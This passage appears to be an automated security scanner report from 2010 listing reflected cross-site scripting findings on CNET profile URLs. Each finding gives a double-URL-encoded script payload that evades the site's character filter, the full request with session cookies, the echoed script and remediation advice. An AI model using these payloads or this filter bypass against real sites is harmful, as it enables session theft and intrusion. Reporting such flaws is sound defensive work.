Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:11:09 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:11:10 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=966
Connection: Keep-Alive
Content-Length: 31039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>justin.yu6b9a3<script>alert(1)</script>735ec90bf97's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83098%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22a7a9a2d85 was submitted in the REST URL parameter 2. This input was echoed as 83098"><script>alert(1)</script>22a7a9a2d85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/katzmaier83098%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22a7a9a2d85/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:45 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:45 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=956
Connection: Keep-Alive
Content-Length: 31140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<input type="hidden" name="profileName" value="katzmaier83098"><script>alert(1)</script>22a7a9a2d85"/>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70163%253cscript%253ealert%25281%2529%253c%252fscript%253eda5233767fb was submitted in the REST URL parameter 2. This input was echoed as 70163<script>alert(1)</script>da5233767fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/katzmaier70163%253cscript%253ealert%25281%2529%253c%252fscript%253eda5233767fb/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:47 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:47 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=961
Connection: Keep-Alive
Content-Length: 31034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<li>katzmaier70163<script>alert(1)</script>da5233767fb's community profile</li>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1ac9f%253cscript%253ealert%25281%2529%253c%252fscript%253e291757f0173 was submitted in the REST URL parameter 2. This input was echoed as 1ac9f<script>alert(1)</script>291757f0173 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/kellymorrison1ac9f%253cscript%253ealert%25281%2529%253c%252fscript%253e291757f0173/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:43 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:44 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=924
Connection: Keep-Alive
Content-Length: 31127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>kellymorrison1ac9f<script>alert(1)</script>291757f0173's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0016%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e389fc635539 was submitted in the REST URL parameter 2. This input was echoed as e0016"><script>alert(1)</script>389fc635539 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/kellymorrisone0016%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e389fc635539/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:42 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:42 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Length: 31116
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="kellymorrisone0016"><script>alert(1)</script>389fc635539"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b91d3%253cscript%253ealert%25281%2529%253c%252fscript%253e40d803e6822 was submitted in the REST URL parameter 2. This input was echoed as b91d3<script>alert(1)</script>40d803e6822 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lancewhitneyb91d3%253cscript%253ealert%25281%2529%253c%252fscript%253e40d803e6822/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:06:57 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:06:57 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=961
Connection: Keep-Alive
Content-Length: 31065
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>lancewhitneyb91d3<script>alert(1)</script>40d803e6822's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b1a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2dfbfbce1b5 was submitted in the REST URL parameter 2. This input was echoed as 2b1a7"><script>alert(1)</script>2dfbfbce1b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lancewhitney2b1a7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2dfbfbce1b5/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:06:55 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:06:55 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=977
Connection: Keep-Alive
Content-Length: 31329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="lancewhitney2b1a7"><script>alert(1)</script>2dfbfbce1b5"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4cf12%253cscript%253ealert%25281%2529%253c%252fscript%253e8ff72b1c529 was submitted in the REST URL parameter 2. This input was echoed as 4cf12<script>alert(1)</script>8ff72b1c529 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/larrymagid4cf12%253cscript%253ealert%25281%2529%253c%252fscript%253e8ff72b1c529/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:43 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:43 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=969
Connection: Keep-Alive
Content-Length: 31114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>larrymagid4cf12<script>alert(1)</script>8ff72b1c529's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9ef87e3075 was submitted in the REST URL parameter 2. This input was echoed as a2e0a"><script>alert(1)</script>c9ef87e3075 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/larrymagida2e0a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9ef87e3075/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:14:41 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:14:41 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=969
Connection: Keep-Alive
Content-Length: 31095
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="larrymagida2e0a"><script>alert(1)</script>c9ef87e3075"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66c96%253cscript%253ealert%25281%2529%253c%252fscript%253ef3196c8d5c2 was submitted in the REST URL parameter 2. This input was echoed as 66c96<script>alert(1)</script>f3196c8d5c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lgrunin66c96%253cscript%253ealert%25281%2529%253c%252fscript%253ef3196c8d5c2/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:50 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:50 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 31005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>lgrunin66c96<script>alert(1)</script>f3196c8d5c2's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22ccf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaaa7922a1f was submitted in the REST URL parameter 2. This input was echoed as 22ccf"><script>alert(1)</script>baaa7922a1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/lgrunin22ccf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaaa7922a1f/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:49 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:49 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=973
Connection: Keep-Alive
Content-Length: 31082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="lgrunin22ccf"><script>alert(1)</script>baaa7922a1f"/> ...[SNIP]...
